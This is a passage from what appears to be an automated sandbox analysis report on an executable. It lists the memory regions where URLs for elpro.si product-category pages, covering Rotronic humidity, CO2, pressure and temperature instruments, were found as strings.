memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/plasticarstvo/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/aktivnost-vode-rotronic-meritve-water-activity-rotr
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/co2-rotronic-merilniki-ogljikovega-dioksida/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dew-point-rotronic-meritve-tocke-rosisca-rotronic-v
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/diferencialni-tlak-rotronic-merilniki-diferencialne
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dodatna-oprema-rotronic-montazna-prikljucna-kalibra
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/kalibracija-vlage-rotronic-naprave-za-kalibracijo-s
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/o2-rotronic-analizatorji-kisika/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/rms-rotronic-monitoring-sistem-2/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/sw-rotronic-programska-oprema/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/
